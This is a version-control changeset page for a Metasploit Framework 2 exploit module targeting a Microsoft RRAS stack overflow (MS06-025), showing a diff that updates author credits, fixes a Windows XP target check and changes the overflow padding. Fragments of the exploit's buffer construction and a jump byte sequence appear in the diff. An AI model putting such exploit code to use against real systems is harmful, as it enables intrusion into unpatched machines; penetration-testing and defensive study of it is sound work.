Changeset 3719

Show
Ignore:
Timestamp:
06/21/06 18:39:53 (2 years ago)
Author:
hdm
Message:

Fixed credit, XP exploitation

Files:

Legend:

Unmodified
Added
Removed
Modified
Copied
Moved
  • framework2/trunk/exploits/rras_ms06_025.pm

    r3715 r3719  
    2424        'Name'    => 'Microsoft RRAS MSO6-025 Stack Overflow', 
    2525        'Version' => '$Revision: 1.1 $', 
    26         'Authors' => [ 'anonymous' ], 
     26        'Authors' =>  
     27        [  
     28                'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>', 
     29                'H D Moore <hdm [at] metasploit.com>' 
     30        ], 
    2731 
    2832        'Arch' => ['x86'], 
     
    157161                  "\xe9\xb7\xfb\xff\xff" ; 
    158162 
    159         } elsif( $target->[0] =! /Windows XP/) { 
     163        } elsif( $target->[0] =~ /Windows XP/) { 
    160164 
    161165                $pattern = 
     
    174178 
    175179        # need to produce an exception 
    176         my $request = $pattern . ("A" x (0x4000 - length ($pattern))); 
     180        my $request = $pattern . Pex::Text::AlphaNumText(0x4000 - length($pattern)); 
    177181 
    178182        my $len = length ($request);